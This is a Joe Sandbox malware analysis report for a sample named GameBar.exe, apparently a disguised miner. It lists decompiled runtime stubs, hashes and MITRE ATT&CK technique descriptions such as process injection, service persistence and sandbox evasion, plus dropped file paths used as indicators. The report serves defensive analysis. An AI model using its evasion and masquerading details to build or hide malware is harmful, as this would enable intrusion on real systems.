Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: wcslen
String ID: 0$@
API String ID: 4088430540-1545510068
Opcode ID: 66d5d2725d7c04d467a20df0661156636a7725396d0a397d7034d989881d8a8d
Instruction ID: 4a703245d4c79749acaa1c9c2f2070478c2954ea3123f6e1abc1c41fae9e3589
Opcode Fuzzy Hash: 66d5d2725d7c04d467a20df0661156636a7725396d0a397d7034d989881d8a8d
Instruction Fuzzy Hash: B7114F2262878186E7509B65F48139EA770EBD8354F544235FB8D87B6AEFBDC44ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EECD440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00007FF67FF67EECD440() {
				intOrPtr* _t8;

				asm("movaps [esp+0x40], xmm6");
				asm("movaps [esp+0x50], xmm7");
				asm("inc esp");
				if ( *_t8 - 6 > 0) goto 0x7eecd530;
				goto __rax;
			}

0x7ff67eecd446
0x7ff67eecd44b
0x7ff67eecd450
0x7ff67eecd459
0x7ff67eecd46f

APIs

fprintf.MSVCRT ref: 00007FF67EECD4B9

Strings

Unknown error, xrefs: 00007FF67EECD530
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF67EECD4A9

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 58f9b6ed4ac1121262e9f69328f87cd9c17c55ab117a9f73a9c38bf543768745
Instruction ID: 03efd8f360af23469da2b5be9cc630f94827e01b1440bb04120db17a4d66964d
Opcode Fuzzy Hash: 58f9b6ed4ac1121262e9f69328f87cd9c17c55ab117a9f73a9c38bf543768745
Instruction Fuzzy Hash: 7001C263918E88C1D212CF1CE8011EA7370FFA975AF285721FA8C66224EF6DE557C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EECD520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF67FF67EECD520(void* __eax) {

				goto 0x7eecd478;
				asm("fninit");
				return __eax;
			}

0x7ff67eecd527
0x7ff67eecd540
0x7ff67eecd542

APIs

fprintf.MSVCRT ref: 00007FF67EECD4B9

Strings

Argument singularity (SIGN), xrefs: 00007FF67EECD520
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF67EECD4A9

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 52e8d86a424ce0a96e66c8212dde5bc8d7979ae27ed70aca6be3c8435cca0f46
Instruction ID: 41b1f16b8eee57a1bd6f9dee8d45a37998502459fe2505be7897265e4c206b97
Opcode Fuzzy Hash: 52e8d86a424ce0a96e66c8212dde5bc8d7979ae27ed70aca6be3c8435cca0f46
Instruction Fuzzy Hash: 2AF06257918E4885D211CF28A4001ABB371FF9D799F285726EB8D66124DF6DE646C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EECD510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF67FF67EECD510(void* __eax) {

				goto 0x7eecd478;
				asm("fninit");
				return __eax;
			}

0x7ff67eecd527
0x7ff67eecd540
0x7ff67eecd542

APIs

fprintf.MSVCRT ref: 00007FF67EECD4B9

Strings

Partial loss of significance (PLOSS), xrefs: 00007FF67EECD510
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF67EECD4A9

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: d8d2bc2637ea2f905933ae24a1a3001d198acca0b2163d8cb34abc09a40d0567
Instruction ID: afd8d3b702c2f1a02e406f5f3e01bd8352d8c19e79ff200ee0a574eae467e421
Opcode Fuzzy Hash: d8d2bc2637ea2f905933ae24a1a3001d198acca0b2163d8cb34abc09a40d0567
Instruction Fuzzy Hash: 29F06257918E4881D211CF28A8001EBB370FF9D799F285726FB8D66564DF6DE646C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EECD500 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF67FF67EECD500(void* __eax) {

				goto 0x7eecd478;
				asm("fninit");
				return __eax;
			}

0x7ff67eecd527
0x7ff67eecd540
0x7ff67eecd542

APIs

fprintf.MSVCRT ref: 00007FF67EECD4B9

Strings

Total loss of significance (TLOSS), xrefs: 00007FF67EECD500
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF67EECD4A9

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 88955a978330e469d59744899c9745f95943303d5f60d5c13f14d5bb68d6e934
Instruction ID: b946d0529be0b1f404999e816484f25d5407e8cf050fb32ec7b3ef31303ac6e9
Opcode Fuzzy Hash: 88955a978330e469d59744899c9745f95943303d5f60d5c13f14d5bb68d6e934
Instruction Fuzzy Hash: 63F0C257818E4881D201CF28A4000EBB370FF9D789F285726FB8D2A524DF6CE646C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EECD4F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF67FF67EECD4F0(void* __eax) {

				goto 0x7eecd478;
				asm("fninit");
				return __eax;
			}

0x7ff67eecd527
0x7ff67eecd540
0x7ff67eecd542

APIs

fprintf.MSVCRT ref: 00007FF67EECD4B9

Strings

The result is too small to be represented (UNDERFLOW), xrefs: 00007FF67EECD4F0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF67EECD4A9

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: a4f58f10d94d036d7cc144da4d9415414d9a54d9a9c1bea7af89253bec7e1b6f
Instruction ID: 66566e29dee421a2573a28af6ee57febc98303f9acbd59435ca980591f94332c
Opcode Fuzzy Hash: a4f58f10d94d036d7cc144da4d9415414d9a54d9a9c1bea7af89253bec7e1b6f
Instruction Fuzzy Hash: 5CF06257918E4881D211CF28A4001ABB370FF9D799F285726FB8D76164DF6DE646C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EECD4E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF67FF67EECD4E0(void* __eax) {

				goto 0x7eecd478;
				asm("fninit");
				return __eax;
			}

0x7ff67eecd527
0x7ff67eecd540
0x7ff67eecd542

APIs

fprintf.MSVCRT ref: 00007FF67EECD4B9

Strings

Overflow range error (OVERFLOW), xrefs: 00007FF67EECD4E0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF67EECD4A9

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: ea02469f736e9d801980ea878f7f18572390235cf04de100e9658c416bcae6b4
Instruction ID: 28ecd8af0a2f247d94972f408e91e47904a76937442baff920bb97ff5fd0161c
Opcode Fuzzy Hash: ea02469f736e9d801980ea878f7f18572390235cf04de100e9658c416bcae6b4
Instruction Fuzzy Hash: 14F06257918E8881D211CF28A4001EBB370FF9D799F285726FB8D66564DF6DE646C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EECD471 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF67EECD4B9

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF67EECD4A9
Argument domain error (DOMAIN), xrefs: 00007FF67EECD471

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 9546010f34e0802a54999dba6db0e8e8b456adcd248c088fa35bd85a5ef11c19
Instruction ID: 69c2549f6c5c0b0308e2b574924936988b2b5ff6222cd19714cde937d3060eb0
Opcode Fuzzy Hash: 9546010f34e0802a54999dba6db0e8e8b456adcd248c088fa35bd85a5ef11c19
Instruction Fuzzy Hash: BFF0621B818F4881D201CF28A4001ABB360FF9D789F685726EE8D26524DF2CD546C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EECDE60 Relevance: 5.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF67EECDE60(void* __ecx) {
				intOrPtr _t1;

				_t1 =  *0x7eee4ee8; // 0x1
				if (_t1 != 0) goto 0x7eecde80;
				return 0;
			}

0x7ff67eecde65
0x7ff67eecde6f
0x7ff67eecde78

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67EECDE87
free.MSVCRT ref: 00007FF67EECDED8
LeaveCriticalSection.KERNEL32 ref: 00007FF67EECDEE4

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: CriticalSection$EnterLeavefree
String ID:
API String ID: 4020351045-0
Opcode ID: 66d19a78fb6b265aa93f116fe9e4863ecae32aa1eb8e1c652905cd2c9a600f0e
Instruction ID: b3006ac37ea3f4c40e34deeff6699454e10975e0472bfa3d82147fb20ea5fcab
Opcode Fuzzy Hash: 66d19a78fb6b265aa93f116fe9e4863ecae32aa1eb8e1c652905cd2c9a600f0e
Instruction Fuzzy Hash: 85111E63F28A038AFB58CBA5E8801792791AFB4B40B545D35E50DC7364DFEDE8598340

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report GameBar.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Libs\WR64.sys

C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_if3i441h.ju3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2je4om5.lpq.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jotfq41m.3pt.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mv5f5r0q.jrq.psm1

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Windows\Temp\__PSScriptPolicyTest_0bqbcp3h.4qd.ps1

C:\Windows\Temp\__PSScriptPolicyTest_30cfw2x1.zlb.ps1

C:\Windows\Temp\__PSScriptPolicyTest_4h3aqghf.dau.ps1

C:\Windows\Temp\__PSScriptPolicyTest_l5do0yx4.gz3.psm1

Windows Analysis Report
GameBar.exe